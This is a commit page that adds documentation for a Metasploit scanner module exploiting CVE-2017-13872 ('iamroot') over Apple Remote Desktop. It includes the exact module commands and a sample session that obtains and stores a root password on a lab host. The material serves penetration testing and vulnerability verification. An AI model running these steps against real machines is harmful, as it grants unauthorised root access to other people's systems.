Skip to content

Commit 5e71be7

Browse files
committed
add ard_root_pw documentation
1 parent c2bb144 commit 5e71be7

File tree

1 file changed

+38
-0
lines changed

1 file changed

+38
-0
lines changed
Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
## Description
2+
3+
This module remotely exploits the remote CVE-2017-13872 (iamroot) vulnerability over Apple Remote Desktop protocol (ARD). It assumes that "System Preferences > Sharing > Screen Sharing" is enabled.
4+
5+
## Verification Steps
6+
7+
1. Do: `use auxiliary/scanner/vnc/ard_root_pw`
8+
2. Do: `set RHOSTS [IP]`
9+
4. Do: `run`
10+
11+
## Scenarios
12+
13+
**Running the scanner**
14+
15+
```
16+
msf > use auxiliary/scanner/vnc/ard_root_pw
17+
msf auxiliary(scanner/vnc/ard_root_pw) > set RHOSTS 172.16.143.129
18+
RHOSTS => 172.16.143.129
19+
msf auxiliary(scanner/vnc/ard_root_pw) > run
20+
21+
[*] 172.16.143.129:5900 - Attempting authentication as root.
22+
[*] 172.16.143.129:5900 - Testing login as root with chosen password.
23+
[+] 172.16.143.129:5900 - Login succeeded - root:xaavMPozB2HmDhGX
24+
[*] Scanned 1 of 1 hosts (100% complete)
25+
[*] Auxiliary module execution completed
26+
```
27+
28+
**Credentials**
29+
30+
```
31+
msf auxiliary(scanner/vnc/ard_root_pw) > creds
32+
Credentials
33+
===========
34+
35+
host origin service public private realm private_type
36+
---- ------ ------- ------ ------- ----- ------------
37+
172.16.143.129 172.16.143.129 5900/tcp (vnc) root xaavMPozB2HmDhGX Password
38+
```

0 commit comments

Comments
 (0)